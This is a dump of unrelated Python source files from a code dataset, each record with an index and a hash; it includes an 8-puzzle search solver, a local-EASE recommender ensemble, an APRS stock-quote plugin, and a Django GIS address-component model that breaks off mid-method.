23,137 | 6b03b16d561b5b804a7253b0ab904eda99dd22a1 | i=input();
print "hi",i;
|
23,138 | 0517bb184eaf33869e0d5ee15816b2293cdaefd9 | #! /usr/bin/python2
from sys import argv
from math import sqrt
from Queue import Queue
from Queue import PriorityQueue
from time import time
import resource
class Statistics:
    """Collects search-run counters: number of expanded nodes and the
    greatest depth of any visited node."""

    def __init__(self):
        self.__nodes_expanded = 0
        self.__depth = 0
        self.__max_search_depth = 0

    def node_expanded(self, node):
        """Record that `node` was expanded."""
        self.__nodes_expanded = self.__nodes_expanded + 1

    def node_visited(self, node):
        """Track the maximum depth over all visited nodes."""
        depth = node.get_depth()
        if depth > self.__max_search_depth:
            self.__max_search_depth = depth

    def get_nodes_expanded(self):
        """Total number of node_expanded() calls so far."""
        return self.__nodes_expanded

    def get_max_search_depth(self):
        """Deepest depth seen by node_visited()."""
        return self.__max_search_depth
""" Models a board state. """
class BoardState:
    """One configuration of an n x n sliding-tile puzzle.

    Stores the tile grid, a link to the predecessor state, the search
    depth, and the move ("Up"/"Down"/"Left"/"Right") that produced it.
    The goal layout has 0 (the blank) top-left with tiles in row-major
    order.
    """

    def __init__(self, state, previous_state, depth, move):
        """Build a state from a comma-separated tile string or a 2-D list."""
        if isinstance(state, str):
            tiles = state.split(",")
            dimension = int(sqrt(len(tiles)))
            self.__grid = [[int(tiles[row * dimension + col]) for col in range(dimension)] for row in range(dimension)]
        elif isinstance(state, list):
            self.__grid = state
        self.__previous_state = previous_state
        self.__depth = depth
        self.__move = move
        # Fix: encode the grid as a base-(n*n) integer so every board maps
        # to a unique value.  The old code concatenated decimal digits,
        # which is ambiguous for tiles >= 10 (15-puzzle: [1,12] vs [11,2]
        # collide) — and search() uses these hashes as state identity.
        base = len(self.__grid) * len(self.__grid)
        encoded = 0
        for row in self.__grid:
            for tile in row:
                encoded = encoded * base + tile
        self.__hash = encoded

    def __get_blank_location(self):
        """Return (row, col) of the blank tile (0), or None if absent."""
        for row in range(len(self.__grid)):
            for col in range(len(self.__grid[row])):
                if self.__grid[row][col] == 0:
                    return (row, col)
        return None

    def __copy_grid(self):
        """Deep-copy the grid so successors can be mutated independently."""
        return [[self.__grid[row][col] for col in range(len(self.__grid))] for row in range(len(self.__grid))]

    def get_possible_next_states(self):
        """Return the legal successors as (direction, new_grid) pairs,
        generated in Up, Down, Left, Right order."""
        next_states = []
        blank_row, blank_col = self.__get_blank_location()
        # Decide if we can go up.
        if blank_row != 0:
            new_grid = self.__copy_grid()
            new_grid[blank_row][blank_col] = new_grid[blank_row - 1][blank_col]
            new_grid[blank_row - 1][blank_col] = 0
            next_states.append(("Up", new_grid))
        # Decide if we can go down.
        if blank_row != len(self.__grid) - 1:
            new_grid = self.__copy_grid()
            new_grid[blank_row][blank_col] = new_grid[blank_row + 1][blank_col]
            new_grid[blank_row + 1][blank_col] = 0
            next_states.append(("Down", new_grid))
        # Left.
        if blank_col != 0:
            new_grid = self.__copy_grid()
            new_grid[blank_row][blank_col] = new_grid[blank_row][blank_col - 1]
            new_grid[blank_row][blank_col - 1] = 0
            next_states.append(("Left", new_grid))
        # Right.
        if blank_col != len(self.__grid) - 1:
            new_grid = self.__copy_grid()
            new_grid[blank_row][blank_col] = new_grid[blank_row][blank_col + 1]
            new_grid[blank_row][blank_col + 1] = 0
            next_states.append(("Right", new_grid))
        return next_states

    def is_goal_state(self):
        """True when every cell holds the value row * n + col."""
        for row in range(len(self.__grid)):
            for col in range(len(self.__grid[row])):
                if self.__grid[row][col] != row * len(self.__grid) + col:
                    return False
        return True

    def get_previous_state(self):
        return self.__previous_state

    def get_path(self):
        """Return the move list from the initial state (whose move is None)
        to this state."""
        path = []
        state = self
        while state.__move != None:
            path.insert(0, state.__move)
            state = state.get_previous_state()
        return path

    def get_depth(self):
        return self.__depth

    def distance(self):
        """Manhattan-distance heuristic to the goal.

        Fix: the blank (0) is now excluded — counting its displacement
        makes the heuristic inadmissible, so A* could return non-optimal
        paths.
        """
        distance = 0
        for row in range(len(self.__grid)):
            for col in range(len(self.__grid)):
                value = self.__grid[row][col]
                if value == 0:
                    continue
                target_position_row = value // len(self.__grid)
                target_position_col = value % len(self.__grid)
                distance = distance + abs(row - target_position_row) + abs(col - target_position_col)
        return distance

    def __hash__(self):
        return self.__hash
def run_bfs(initial_state):
    """Breadth-first search: FIFO frontier."""
    fifo = Queue()
    search(initial_state, fifo.get, fifo.put, fifo.empty, False)
def run_dfs(initial_state):
    """Depth-first search: LIFO (stack) frontier; successors are pushed
    reversed so they pop in natural order."""
    stack = []
    search(initial_state, stack.pop, stack.append, lambda: not stack, True)
def run_ast(initial_state):
    """A* search.

    Fixes over the original:
    - priority is f(n) = g(n) + h(n) (depth + Manhattan distance); the old
      code ordered by h(n) alone, which is greedy best-first, not A*.
    - a monotonically increasing tie-breaker sits between the priority and
      the state, so equal-priority entries never compare BoardState
      objects (which have no __lt__ and raise TypeError on Python 3).
    """
    from itertools import count
    frontier = PriorityQueue()
    tie_breaker = count()
    search(
        initial_state,
        lambda: frontier.get()[2],
        lambda state: frontier.put(
            (state.get_depth() + state.distance(), next(tie_breaker), state)),
        lambda: frontier.empty(),
        False)
def search(initial_state, next_state_function, frontier_add_function, is_frontier_empty, reverse):
    """Generic state-space search.

    The caller supplies the frontier discipline through three callbacks
    (pop, push, emptiness test), so this one routine serves BFS, DFS and
    A*.  `reverse` flips the successor expansion order (used by DFS so
    moves come off the stack in Up/Down/Left/Right order).  When a goal is
    found, writes the solution statistics to output.txt.
    """
    start_time = time()
    # Hash values stand in for the states themselves in both sets; state
    # identity is therefore exactly BoardState.__hash__.
    visited = set()
    frontier = set()
    statistics = Statistics()
    frontier_add_function(initial_state)
    frontier.add(hash(initial_state))
    goal_state = None
    while not is_frontier_empty():
        current_state = next_state_function()
        visited.add(hash(current_state))
        frontier.remove(hash(current_state))
        if current_state.is_goal_state():
            goal_state = current_state
            break
        else:
            next_states = current_state.get_possible_next_states()
            if reverse:
                next_states = reversed(next_states)
            statistics.node_expanded(current_state)
            for direction, grid in next_states:
                new_state = BoardState(grid, current_state, current_state.get_depth() + 1, direction)
                new_state_hash = hash(new_state)
                # Skip states already visited or already queued.
                if not new_state_hash in visited and not new_state_hash in frontier:
                    statistics.node_visited(new_state)
                    frontier_add_function(new_state)
                    frontier.add(new_state_hash)
    if goal_state != None:
        # current_state is the goal here (the loop broke on it), so using
        # it for search_depth below is safe.
        output_file = open("output.txt", "w")
        path = goal_state.get_path()
        output_file.write("path_to_goal: %s\n" % (path))
        output_file.write("cost_of_path: %i\n" % (len(path)))
        output_file.write("nodes_expanded: %i\n" % (statistics.get_nodes_expanded()))
        output_file.write("search_depth: %i\n" % (current_state.get_depth()))
        output_file.write("max_search_depth: %i\n" % (statistics.get_max_search_depth()))
        # ru_maxrss is reported in kilobytes on Linux; convert to MB.
        # NOTE(review): on macOS it is in bytes — confirm target platform.
        mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1024
        run_time = time() - start_time
        output_file.write("running_time: %s\n" % (str(run_time)))
        output_file.write("max_ram_usage: %s\n" % (str(mem)))
        output_file.close()
def main():
    """Parse argv (algorithm name, initial board string) and dispatch to
    the matching search routine; unknown names are silently ignored."""
    algorithm = argv[1]
    initial_board_state = BoardState(argv[2], None, 0, None)
    dispatch = {"bfs": run_bfs, "dfs": run_dfs, "ast": run_ast}
    runner = dispatch.get(algorithm)
    if runner is not None:
        runner(initial_board_state)
if __name__ == "__main__":
main() |
23,139 | 5088c09a1710a7e96bad13fa96dd80c68e9440dc | sentence = "This is a common interview question"
# Count every non-space character of `sentence` and print the
# (character, count) pair with the highest count.
this_dict = {}
for ch in sentence:
    if ch == " ":
        continue
    this_dict[ch] = this_dict.get(ch, 0) + 1
sorted_dict = sorted(this_dict.items(), key=lambda kv: kv[1], reverse=True)
print(sorted_dict[0])
|
23,140 | a5447733bd17b843b7c926e8fca87c4e8f914620 | from django.urls import path
from . import views
# used within django.url.reverse() method calls
app_name = 'user'

# URL patterns for the user API: account creation, token authentication,
# and the authenticated user's own profile.
urlpatterns = [
    # link the url path with the view, and define a pattern for the reverse()
    path('create/', views.CreateUserView.as_view(), name='create'),
    path('token/', views.CreateTokenView.as_view(), name='token'),
    path('me/', views.ManageUserView.as_view(), name='self'),
]
|
23,141 | f764eec064b0b862255d10f0e782dabc37b14ac4 | r=float(input())
# Sphere volume V = (4/3)*pi*r^3 for the radius read above.
# NOTE(review): 3.14159 (not math.pi) looks deliberate — online-judge
# problems often mandate this exact constant; confirm before changing.
volume=(4*3.14159*r*r*r)/3;
print("VOLUME = %.3lf" % volume)
|
23,142 | 64c885294a72e47b3e72f01bf22209a1e93ad7bf |
if __name__=='__main__':
print('----------- 用于从接受的新数据,进行构造,利用模型产生新的提交结果 -----------') |
23,143 | 98f228b09359ee495b1f002b61f8a79d39389885 | import os
import math
import copy
import pickle
from time import time
import numpy as np
from scipy import sparse
import torch
from torch import dtype
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from concurrent import futures
from base.BaseRecommender import BaseRecommender
from dataloader.DataBatcher import DataBatcher
from utils import Logger, set_random_seed
from sklearn.cluster import KMeans
from collections import OrderedDict
from tqdm import tqdm
import warnings
warnings.filterwarnings("ignore")
class LOCA_EASE(BaseRecommender):
    """LOCA ensemble built on local EASE models.

    Picks `num_local` anchor users, trains one EASE model per
    anchor-centred user community (community membership and blending come
    from a kernel over user-embedding distances), and at inference blends
    the local predictions with kernel weights, falling back to a
    pre-computed global EASE output for users no local model covers.
    """

    def __init__(self, dataset, model_conf, device):
        super(LOCA_EASE, self).__init__(dataset, model_conf)
        self.dataset = dataset
        self.num_users = dataset.num_users
        self.num_items = dataset.num_items

        # CoLA conf.
        self.num_local = model_conf['num_local']                # number of anchors / local models
        self.anchor_selection = model_conf['anchor_selection']  # 'kmeans' | 'random' | 'coverage'
        self.dist_type = model_conf['dist_type']
        self.kernel_type = model_conf['kernel_type']
        self.train_h = model_conf['train_h']                    # kernel bandwidth for training weights
        self.test_h = model_conf['test_h']                      # kernel bandwidth for inference weights
        self.embedding_type = model_conf['embedding']
        self.model_type = 'EASE'
        self.user_embedding = self.load_embedding(self.embedding_type)
        self.kernel_matrix = self.build_kernel_matrix()
        # Users with non-zero test-kernel weight for each local model.
        self.candidate_users = []
        for kernel in self.kernel_matrix:
            self.candidate_users.append(kernel[2].nonzero()[0])
        self.num_local_threads = model_conf['num_local_threads']

        # Local conf.
        self.model_conf = model_conf
        self.local_models = []
        self.local_dirs = []
        self.device = device
        # share_memory() is presumably inherited from BaseRecommender /
        # nn.Module (needed for the process pool) — confirm.
        self.share_memory()

    def train_single_model(self, local_num):
        """Train the `local_num`-th local EASE model; returns
        (best_score, train_time).  Designed to run inside a worker
        process, so shared state comes through self.common_object."""
        # KEY: make it executed in independent threads.
        evaluator, early_stop, local_conf = self.common_object
        early_stop = copy.deepcopy(early_stop)
        logger = self.init_local_logger(local_num)
        logger.info('Local %d train start...' % local_num)

        # build local model
        train_weight = torch.tensor(self.kernel_matrix[local_num][0]) # vector [Num_user]
        test_weight = torch.tensor(self.kernel_matrix[local_num][2]) # vector [Num_user]
        local_model = LocalEASE(local_num, train_weight, test_weight, self.candidate_users[local_num], self.dataset, self.model_type, self.model_conf, self.device)

        # pass optimizer, evaluator, weight matrix with conf.
        local_best_score, local_train_time = local_model.train_model(self.dataset, evaluator, early_stop, logger, local_conf)

        # train done.
        logger.info('Local %d done...(%.2fs)' % (local_num, local_train_time))
        return local_best_score, local_train_time

    def train_model(self, dataset, evaluator, early_stop, logger, config):
        """Train all local models (in a process pool when
        num_local_threads > 1), then evaluate the blended recommender.
        Returns (test_score, total_train_time)."""
        self.base_dir = logger.log_dir
        logger.info("Train coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (np.mean(self.train_coverage), max(self.train_coverage), min(self.train_coverage)))
        logger.info("Test coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (np.mean(self.test_coverage), max(self.test_coverage), min(self.test_coverage)))
        self.common_object = (evaluator, early_stop, config)
        # dataset.set_eval_data('valid')
        total_train_time = 0.0
        train_start = time()

        # train all models
        if self.num_local_threads > 1:
            with futures.ProcessPoolExecutor(max_workers=self.num_local_threads) as exe:
                ret = list(exe.map(self.train_single_model, list(range(self.num_local))))
        else:
            for i in range(self.num_local):
                local_best_score, local_train_time = self.train_single_model(i)
                total_train_time += local_train_time
        # NOTE(review): this overwrites the per-model time accumulated
        # above with wall-clock time — confirm which one is intended.
        total_train_time = time() - train_start

        test_score = evaluator.evaluate(self)
        test_score_str = ['%s=%.4f' % (k, test_score[k]) for k in test_score]
        logger.info(', '.join(test_score_str))
        return test_score, total_train_time

    def init_local_logger(self, local_num):
        """Create (if needed) the per-local-model log directory under
        base_dir and return a Logger bound to it."""
        exp_dir = os.path.join(self.base_dir, 'local_%d' % local_num)
        if not os.path.exists(exp_dir):
            os.mkdir(exp_dir)
        logger = Logger(exp_dir)
        # self.exp_logger.append(logger)
        return logger

    def predict(self, user_ids, eval_pos_matrix, eval_items=None):
        """Blend local model scores (kernel-weighted average) for the given
        users, substituting the pre-computed global model's output where no
        local model covers a user; seen items are masked to -inf."""
        # mode = dataset.eval_mode
        # mode = self.eval_mode
        batch_pos_matrix = eval_pos_matrix[user_ids]

        # ======local output
        eval_output = torch.zeros((self.num_users, self.num_items), dtype=torch.float32)
        weights_sum = torch.zeros((self.num_users, 1), dtype=torch.float32)
        for local_num in range(self.num_local):
            # print("local_%d loading..." % local_num)
            local_dir = os.path.join(self.base_dir, 'local_%d' % local_num)
            train_weight = torch.tensor(self.kernel_matrix[local_num][0]) # vector
            test_weight = torch.tensor(self.kernel_matrix[local_num][2]) # vector
            local_model = LocalEASE(local_num, train_weight, test_weight, self.candidate_users[local_num], self.dataset, self.model_type, self.model_conf, self.device)
            local_model.restore(local_dir)
            cand_users = self.candidate_users[local_num]
            cand_eval_users = [u for u in user_ids if u in cand_users]
            # local_pred: (# cand_eval_users, # items)
            local_pred = local_model.predict(cand_eval_users, eval_pos_matrix, eval_items)
            # weights = train_weight if mode == 'valid' else test_weight
            weights = test_weight
            local_weights = weights[cand_eval_users].view(-1, 1)
            eval_output[cand_eval_users] += torch.FloatTensor(local_pred) * local_weights
            # eval_output[cand_users] += local_pred[cand_users] * weights.view(-1, 1)[cand_users]
            weights_sum[cand_eval_users] += local_weights
        eval_output = eval_output[user_ids]
        weights_sum = weights_sum[user_ids]
        # Weighted average; users with zero total weight produce NaN here
        # and are zeroed so the global fallback below takes over.
        eval_output /= weights_sum
        eval_output[torch.isnan(eval_output)] = 0.0 # float('-inf')

        # ====== global output
        with open(os.path.join(self.dataset.data_dir, self.dataset.data_name, 'output', self.model_type + '_output.p'), 'rb') as f:
            global_pred = pickle.load(f)[user_ids]
        # global_pred = np.zeros_like(eval_output)
        zero_mask = torch.eq(weights_sum, 0).float()

        # ====== aggregate
        eval_output = torch.Tensor(global_pred) * zero_mask + eval_output
        eval_output = eval_output.numpy()
        eval_output[batch_pos_matrix.nonzero()] = float('-inf')
        return eval_output

    def restore(self, log_dir):
        """Point the ensemble at an existing experiment directory; local
        models are lazily restored inside predict()."""
        self.base_dir = log_dir
        pass

    def dist(self, a, anchor=None):
        """Angular distance (arccos of cosine similarity, scaled to [0, 1]).

        With `anchor` None, returns the full pairwise matrix over the rows
        of `a`; otherwise a vector of distances from row `anchor`.  Returns
        the sentinel 999 when all similarities are zero.
        """
        # anchor --> matrix
        if anchor is None:
            if np.sum(a @ a.T) == 0:
                return 999
            numer = a @ a.T
            norm = np.reshape(np.linalg.norm(a, axis=1), (-1, 1))
            denom = np.maximum(norm * norm.T, 1e-10)
            return (2 / math.pi) * np.arccos(np.clip(numer / denom, -1, 1))
        # anchor --> vector
        else:
            a_anchor = np.reshape(a[anchor], (1, -1))
            if np.sum(a_anchor @ a.T) == 0:
                return 999
            numer = a_anchor @ a.T # (1, user)
            norm = np.reshape(np.linalg.norm(a, axis=1), (-1, 1))
            denom = np.maximum(norm[anchor] * norm.T, 1e-10) # (1, user)
            return np.squeeze((2 / math.pi) * np.arccos(np.clip(numer / denom, -1, 1)))

    def kernel(self, a, h=0.8, kernel_type='Epanechnikov', anchor=None):
        """Kernel weight as a function of angular distance with bandwidth
        `h`; supports Epanechnikov, uniform, triangular and random kernels.
        Shape follows dist(): matrix when anchor is None, vector otherwise."""
        if anchor is None:
            if kernel_type.lower() == 'epanechnikov':
                return (3 / 4) * np.maximum(1 - np.power(self.dist(a) / h, 2), 0)
            if kernel_type.lower() == 'uniform':
                return (self.dist(a) < h)
            if kernel_type.lower() == 'triangular':
                return max((1 - self.dist(a) / h), 0)
            if kernel_type.lower() == 'random':
                return np.random.uniform(0, 1) * (self.dist(a) < h)
        else:
            if kernel_type.lower() == 'epanechnikov':
                return (3 / 4) * np.maximum(1 - np.power(self.dist(a, anchor) / h, 2), 0)
            if kernel_type.lower() == 'uniform':
                return (self.dist(a, anchor) < h)
            if kernel_type.lower() == 'triangular':
                return max((1 - self.dist(a, anchor) / h), 0)
            if kernel_type.lower() == 'random':
                return np.random.uniform(0, 1) * (self.dist(a, anchor) < h)

    def load_embedding(self, embedding_type):
        """Unpickle the pre-computed user embedding matrix for the given
        embedding type from the dataset's embedding directory."""
        with open(os.path.join(self.dataset.data_dir, self.dataset.data_name, 'embedding', embedding_type + '_user.p'), 'rb') as f:
            embedding = pickle.load(f)
        return embedding

    def build_kernel_matrix(self):
        """Select the anchors and build, per local model, the tuple
        (train_user_kernel, train_item_kernel, test_user_kernel,
        test_item_kernel); item kernels are all-ones (user-local models
        only).  Also records per-model train/test coverage fractions."""
        # for each local model
        if self.anchor_selection == 'kmeans':
            user_dist_with_centers = KMeans(n_clusters=self.num_local, random_state=0).fit_transform(self.user_embedding)
            # For each cluster, the user closest to its centre is the anchor.
            user_anchors = np.argsort(user_dist_with_centers, axis=0)[0]
        elif self.anchor_selection == 'random':
            user_anchors = np.random.choice(self.num_users, size=self.num_local, replace=False)
        elif self.anchor_selection == 'coverage':
            user_anchors = np.zeros(self.num_local, dtype=int)
            W_mat = np.zeros((self.num_users, self.num_users), dtype=int)
            # if j is covered by i, W_mat[u,i] = 1.
            # NOTE(review): only every 10th user is considered as a
            # potential anchor (step 10) — presumably a speed shortcut;
            # confirm.
            for u in tqdm(range(0, self.num_users, 10)):
                u_cover = np.nonzero(self.kernel(self.user_embedding, self.test_h, self.kernel_type, u))[0]
                W_mat[u, u_cover] = 1
        else:
            raise Exception("Choose correct self.anchor_selection")
        item_anchors = np.random.choice(self.num_items, size=self.num_local, replace=False)

        # for each local model
        kernel_ret = []
        self.train_coverage = []
        self.test_coverage = []
        for t in range(self.num_local):
            # select anchor
            if self.anchor_selection == 'coverage':
                user_anchors[t] = np.argmax(np.sum(W_mat, axis=1)) # maximum coverage becomes new anchor
                new_covered = np.nonzero(W_mat[user_anchors[t]])[0] # elements which are covered
                W_mat[:, new_covered] = 0 # eliminate elements which are covered
            user_anchor_t = user_anchors[t]
            item_anchor_t = item_anchors[t]

            # train user kernel
            train_user_kernel_t = self.kernel(self.user_embedding, self.train_h, self.kernel_type, user_anchor_t) #.astype(np.float32)
            train_item_kernel_t = np.ones(self.num_items)#.astype(np.float32)
            train_coverage_size = (np.count_nonzero(train_user_kernel_t) * np.count_nonzero(train_item_kernel_t)) / (self.num_users * self.num_items)

            # test user kernel
            test_user_kernel_t = self.kernel(self.user_embedding, self.test_h, self.kernel_type, user_anchor_t) #.astype(np.float32)
            test_item_kernel_t = np.ones(self.num_items)#.astype(np.float32)
            test_coverage_size = (np.count_nonzero(test_user_kernel_t) * np.count_nonzero(test_item_kernel_t)) / (self.num_users * self.num_items)

            kernel_ret.append((train_user_kernel_t, train_item_kernel_t, test_user_kernel_t, test_item_kernel_t))
            self.train_coverage.append(train_coverage_size)
            self.test_coverage.append(test_coverage_size)
            print("Anchor %3d coverage : %.5f (train), %.5f (test)" % (t, train_coverage_size, test_coverage_size))
        print("Train coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (
            np.mean(self.train_coverage), max(self.train_coverage), min(self.train_coverage)))
        print("Test coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (
            np.mean(self.test_coverage), max(self.test_coverage), min(self.test_coverage)))
        return kernel_ret
"""
Wrapper class for local model.
Local model can be any type.
"""
class LocalEASE(BaseRecommender):
    """One local EASE model: closed-form item-item weights fitted on
    interactions re-weighted by this community's train kernel weights."""

    def __init__(self, local_num, train_weight, test_weight, candidate_users, dataset, model_type, model_conf, device):
        super(LocalEASE, self).__init__(dataset, model_conf)
        self.dataset = dataset
        self.num_users = dataset.num_users
        self.num_items = dataset.num_items
        self.model_conf = model_conf
        self.device = device

        self.local_num = local_num           # index of this local model
        self.train_weight = train_weight     # vector tensor
        self.test_weight = test_weight       # vector tensor
        self.candidate_users = candidate_users
        self.reg = model_conf['reg']         # L2 regularization strength (lambda)

    def train_model(self, dataset, evaluator, early_stop, logger, config):
        """Fit EASE in closed form on the kernel-weighted interaction
        matrix, pickle the item-item weights, and evaluate on this model's
        candidate users.  Returns (best_score, train_time)."""
        # exp conf.
        log_dir = logger.log_dir

        # prepare data
        train_matrix = dataset.train_matrix
        # Normalize user weights so they sum to num_items, then apply them
        # as a diagonal re-weighting of the rows of X.
        wU = self.train_weight.numpy()
        wU = wU * self.num_items / wU.sum()
        WU = sparse.diags(wU)
        start = time()

        # P = (X^T * X + λI)^−1
        G = train_matrix.transpose().dot(WU).dot(train_matrix).toarray()
        diag = np.diag_indices(self.num_items)
        G[diag] += self.reg
        P = torch.Tensor(G).inverse()

        # B = P * (X^T * X − diagMat(γ))
        self.enc_w = -P / torch.diag(P)
        self.enc_w[diag] = 0

        # Save best model
        with open(os.path.join(log_dir, 'best_model.p'), 'wb') as f:
            pickle.dump(self.enc_w, f, protocol=4)
        test_score = evaluator.evaluate_partial(self, candidate_users=self.candidate_users)
        test_score_str = ['%s=%.4f' % (k, test_score[k]) for k in test_score]
        logger.info('[Local %3d] ' % self.local_num + ', '.join(test_score_str))
        total_train_time = time() - start
        return early_stop.best_score, total_train_time

    def predict(self, user_ids, eval_pos_matrix, eval_items=None):
        """Score items for the given users as X · B; items outside
        `eval_items` (or already-seen items when it is None) are -inf."""
        batch_eval_pos = eval_pos_matrix[user_ids]
        eval_output = torch.Tensor(batch_eval_pos.toarray()) @ self.enc_w
        if eval_items is not None:
            eval_output[np.logical_not(eval_items)]=float('-inf')
        else:
            eval_output[batch_eval_pos.nonzero()] = float('-inf')

        # apply weights
        return eval_output.numpy()

    def restore(self, log_dir):
        """Load the pickled item-item weight matrix from `log_dir`."""
        with open(os.path.join(log_dir, 'best_model.p'), 'rb') as f:
            self.enc_w = pickle.load(f)
|
23,144 | 9ba8706bf507b985ba7b3504def2c7d43a82d18b | import logging
import re
from aprsd import plugin, trace
import yfinance as yf
LOG = logging.getLogger("APRSD")
class StockPlugin(plugin.APRSDPluginBase):
    """Stock market plugin for fetching stock quotes"""

    version = "1.0"
    # Matches any message starting with 's' or 'S' (e.g. "stock MSFT").
    command_regex = "^[sS]"
    command_name = "stock"

    @trace.trace
    def command(self, fromcall, message, ack):
        """Parse the ticker symbol from the message and reply with its
        ask/high/low quote, or an error string on a missing or
        unresolvable symbol."""
        LOG.info("StockPlugin")
        # Capture the last whitespace-separated token as the ticker symbol.
        a = re.search(r"^.*\s+(.*)", message)
        if a is not None:
            searchcall = a.group(1)
            stock_symbol = searchcall.upper()
        else:
            reply = "No stock symbol"
            return reply
        LOG.info("Fetch stock quote for '{}'".format(stock_symbol))
        try:
            stock = yf.Ticker(stock_symbol)
            reply = "{} - ask: {} high: {} low: {}".format(
                stock_symbol,
                stock.info["ask"],
                stock.info["dayHigh"],
                stock.info["dayLow"],
            )
        except Exception as e:
            # Network/JSON/KeyError failures from yfinance all end up here;
            # reply with a short error instead of crashing the plugin.
            LOG.error(
                "Failed to fetch stock '{}' from yahoo '{}'".format(stock_symbol, e),
            )
            reply = "Failed to fetch stock '{}'".format(stock_symbol)
        return reply.rstrip()
|
23,145 | 64c6f53cc12835558ad3271d16172174f5257019 | /Users/aysa.fan/anaconda3/lib/python3.6/tarfile.py |
23,146 | fe1846b142566171ff11997602aa4dcc93934620 | # -*- coding: utf-8 -*-
import simplejson as json
from django.contrib.gis.db import models
from django.contrib.gis.geos import Point
from django.template.defaultfilters import slugify
from django.core.exceptions import MultipleObjectsReturned
from googlemaps_localities import settings as localities_settings
from googlemaps_localities import strings, constants
from googlemaps_localities.utils import get_redis_connection
from common.utils.debug import writelog
from rest.utils import render_as_json
class GoogleMapsAddressComponent(models.Model):
"""
Implements a Google Maps component address object
"""
short_name = models.CharField(
verbose_name=strings.GMAC_SHORT_NAME,
max_length=128
)
long_name = models.CharField(
verbose_name=strings.GMAC_LONG_NAME,
max_length=128
)
formatted_name = models.CharField(
verbose_name=strings.GMAC_FORMATTED_NAME,
max_length=512
)
slug = models.SlugField(
verbose_name=strings.GMAC_SLUG,
max_length=512,
blank=True,
null=True
)
component_type = models.CharField(
verbose_name=strings.GMAC_COMPONENT_TYPE,
choices=constants.ADDRESS_COMPONENT_TYPE_CHOICES,
max_length=128
)
parent = models.ForeignKey('self',
verbose_name=strings.GMAC_PARENT,
blank=True,
null=True
)
location = models.PointField(
verbose_name=strings.GMAC_LOCATION,
blank=True,
null=True
)
northeast_bound = models.PointField(
verbose_name=strings.GMAC_NORTHEAST_BOUND,
blank=True,
null=True
)
soutwest_bound = models.PointField(
verbose_name=strings.GMAC_SOUTHWEST_BOUND,
blank=True,
null=True
)
northeast_viewport = models.PointField(
verbose_name=strings.GMAC_NORTHEAST_VIEWPORT,
blank=True,
null=True
)
soutwest_viewport = models.PointField(
verbose_name=strings.GMAC_SOUTHWEST_VIEWPORT,
blank=True,
null=True
)
created_at = models.DateTimeField(
verbose_name=strings.GMAC_CREATED_AT,
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name=strings.GMAC_UPDATED_AT,
auto_now=True
)
class Meta:
ordering = ('formatted_name','created_at', )
verbose_name = strings.ADDRESS_COMPONENT
verbose_name_plural = strings.ADDRESS_COMPONENT_PLURAL
unique_together = (
('short_name', 'long_name', 'component_type', 'parent', ),
)
def __unicode__(self):
    # Human-readable representation (Python 2 Django uses this in the admin).
    return self.formatted_name
def save(self, *args, **kwargs):
    """Persist the component.

    (Re)builds the slug when it is missing or when override_slug=True is
    passed, then refreshes the parent's Redis children caches so lookups
    stay consistent with the new tree.
    """
    if self.slug is None or kwargs.pop('override_slug', False):
        self.slug = self.create_slug()
    result = super(GoogleMapsAddressComponent, self).save(*args, **kwargs)
    if self.parent is not None:
        self.parent.sync_all_children_to_redis()
        self.parent.sync_children_to_redis()
    return result
def create_slug(self):
    """Build a '/'-joined slug from the root ancestor down to this
    component, slugifying each element's short name."""
    parts = []
    elements = self.get_lineage(reverse=True)
    for e in elements:
        candidate = e.short_name
        if candidate.isdigit():
            # Purely numeric short names fall back to the long name
            # (presumably for readable slugs) — confirm intent.
            candidate = e.long_name
        parts.append(slugify(candidate))
    return '/'.join(parts)
@staticmethod
def check_component_type(component_type):
    """Return True when `component_type` is a configured address-component type."""
    return component_type in dict(constants.ADDRESS_COMPONENT_TYPE_CHOICES)
@staticmethod
def get_or_create(short_name, long_name, component_type, parent=None):
    """Fetch the component matching the given fields, creating (and
    saving) it when absent; returns None for an invalid component type.

    NOTE(review): newly created objects call update_formatted_name(),
    which is not visible in this chunk — presumably defined elsewhere in
    the class; confirm.
    """
    # Check component type
    if not GoogleMapsAddressComponent.check_component_type(component_type):
        return None

    # Params for lookup
    params = {}
    params['short_name'] = short_name
    params['long_name'] = long_name
    params['component_type'] = component_type
    if parent is not None:
        params['parent'] = parent

    # Object lookup
    try:
        obj = GoogleMapsAddressComponent.objects.get(**params)
    except GoogleMapsAddressComponent.DoesNotExist:
        # Not found, we create it.
        obj = GoogleMapsAddressComponent(
            short_name=short_name,
            long_name=long_name,
            component_type=component_type,
            parent=parent
        )
        obj.update_formatted_name(commit=False)
        obj.save()
    return obj
def get_ancestors(self, reverse=False):
    """Walk parent links up to the root; nearest ancestor first unless
    `reverse` is True (then root first)."""
    chain = []
    node = self.parent
    while node is not None:
        chain.append(node)
        node = node.parent
    if reverse:
        chain.reverse()
    return chain
def get_lineage(self, reverse=False):
    """This component followed by all its ancestors (self first unless
    `reverse` is True, then root first)."""
    lineage = [self] + self.get_ancestors()
    if reverse:
        lineage.reverse()
    return lineage
def get_immediate_children(self):
    """QuerySet of components whose parent is this component."""
    return GoogleMapsAddressComponent.objects.filter(parent=self)
def get_all_children(self, allowed_types=None):
    """Return every descendant component (recursive), optionally
    restricted to the given component types.

    Fix: the original filtered by calling results.remove() while
    iterating the same list; each removal skips the following element,
    so disallowed children could survive the filter.  The filter is now
    a list comprehension over the finished result.
    """
    allowed_types = allowed_types or []
    results = []
    immediate_children = self.get_immediate_children()
    results.extend(immediate_children)
    for child in immediate_children:
        # Recursion gathers the full subtree; the type filter is applied
        # once at the end (matching the original's intent).
        results.extend(child.get_all_children())
    if len(allowed_types) > 0:
        results = [child for child in results
                   if child.component_type in allowed_types]
    return results
def get_all_children_seq(self):
    """Iterative (explicit-queue) equivalent of get_all_children(),
    without the type filter; returns every descendant component."""
    results = []
    queue = []
    children = self.get_immediate_children()
    results.extend(children)
    queue.extend(children)
    while len(queue) > 0:
        node = queue.pop()
        children = node.get_immediate_children()
        results.extend(children)
        queue.extend(children)
    return results
@staticmethod
def get_children_from_redis(gmac_id, as_objects=True):
    """Collect every descendant id of `gmac_id` by walking the per-node
    immediate-children lists cached in Redis.

    Returns model objects unless `as_objects` is False (then raw id
    values as stored in Redis).
    """
